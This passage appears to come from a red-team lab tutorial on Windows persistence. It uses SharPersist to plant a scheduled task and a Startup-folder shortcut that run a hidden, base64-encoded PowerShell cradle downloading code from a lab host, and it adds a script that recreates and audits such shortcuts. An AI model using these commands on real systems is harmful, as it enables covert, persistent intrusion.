The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, a user logging on, the computer going idle, the workstation being locked, or a combination thereof.
Let's create a scheduled task that will execute a PowerShell payload once every hour. To save ourselves from having to deal with lots of quotation marks in the IEX cradle, we can encode it to base64 and execute it using the -EncodedCommand parameter in PowerShell (often abbreviated to -enc).
This is slightly fiddly because -EncodedCommand expects the base64 of the UTF-16LE bytes of the script (what .NET calls "Unicode"), not UTF-8 or ASCII. A payload encoded with the wrong character set decodes to garbage inside powershell.exe and simply fails to run.
In PowerShell:
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://10.10.5.120/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==
In Linux:
$ str='IEX ((new-object net.webclient).downloadstring("http://10.10.5.120/a"))'
$ echo -n "$str" | iconv -t UTF-16LE | base64 -w 0
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Debug\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==" -n "<name>" -m add -o hourly

[*] INFO: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] INFO: Command Args: -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==
[*] INFO: Scheduled Task Name: <name>
[*] INFO: Option: hourly
[+] SUCCESS: Scheduled task added
Where:
* -t is the desired persistence technique.
* -c is the command to execute.
* -a are any arguments for that command.
* -n is the name of the task.
* -m is to add the task (you can also remove, check and list).
* -o is the task frequency.
On the console of WKSTN-1, open the Task Scheduler and select Task Scheduler Library in the left-hand menu. You should see your task appear in the main window. You may of course wait for one hour, or simply highlight the task and click Run in the right-hand Actions menu. This should spawn another Beacon.
Startup Folder
Applications, files and shortcuts within a user's Startup folder are launched automatically each time that user logs in interactively. It's commonly used to bootstrap the user's home environment (set wallpapers, create shortcuts, etc.).
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Debug\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==" -f "UserEnvSetup" -m add

[*] INFO: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] INFO: Command Args: -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==
[*] INFO: File Name: UserEnvSetup
[+] SUCCESS: Startup folder persistence created
[*] INFO: LNK File located at: C:\Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UserEnvSetup.lnk
[*] INFO: SHA256 Hash of LNK file: B34647F8D8B7CE28C1F0DA3FF444D9B7244C41370B88061472933B2607A169BC
Where:
* -f is the filename to save as.
Use the WKSTN-1 console to check C:\Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ for the file that was dropped. To test it, simply double-click the link file to run it, or reboot the VM and log back in as the user. Note that Startup folder entries only fire on an interactive logon, so this gives you nothing until someone actually logs on to the host.
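The same drop done by hand with the WScript.Shell COM object, reproducing what SharPersist reports (LNK path and SHA256) and then enumerating the Startup folder the way a reviewer would, decoding any -enc argument found behind a shortcut. This is an added example, not code from the course or from SharPersist. It assumes the lab listener http://10.10.5.120/a and the file name UserEnvSetup from the page.

```powershell
# Added example; not course or SharPersist code.
# Assumes the lab listener and file name from the page.

$cradle = 'IEX ((new-object net.webclient).downloadstring("http://10.10.5.120/a"))'
$enc    = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))

# Resolve the per-user Startup folder instead of hard-coding the profile path.
$startup = [Environment]::GetFolderPath([Environment+SpecialFolder]::Startup)
$lnkPath = Join-Path $startup 'UserEnvSetup.lnk'

$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut($lnkPath)
$lnk.TargetPath       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$lnk.Arguments        = "-nop -w hidden -enc $enc"
$lnk.WorkingDirectory = 'C:\Windows\System32'
$lnk.WindowStyle      = 7        # 7 = start minimised; "-w hidden" then hides the console
$lnk.Save()

# What SharPersist printed: where the LNK landed and its hash, for later cleanup.
$lnkPath
(Get-FileHash -Path $lnkPath -Algorithm SHA256).Hash

# The check: list every shortcut in the Startup folder, resolve its target and
# decode any -enc / -EncodedCommand argument so the real command line is visible.
Get-ChildItem -Path $startup -Filter '*.lnk' | ForEach-Object {
    $s       = $wsh.CreateShortcut($_.FullName)
    $cmdline = "$($s.TargetPath) $($s.Arguments)"
    if ($s.Arguments -match '-enc(odedcommand)?\s+(\S+)') {
        $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
        "{0}`n  target : {1}`n  decoded: {2}" -f $_.Name, $cmdline, $decoded
    } else {
        "{0}`n  target : {1}" -f $_.Name, $cmdline
    }
}

# Cleanup at the end of the engagement:
# Remove-Item -Path $lnkPath
```

The hash you get will not match the one in the course output, and that is expected: a .lnk embeds creation timestamps and link-tracking data, so two shortcuts with identical targets hash differently on different hosts. Record the hash so you can remove exactly the file you dropped, but do not expect it to be a useful indicator for anyone else; the shortcut's target and arguments are what persist across machines.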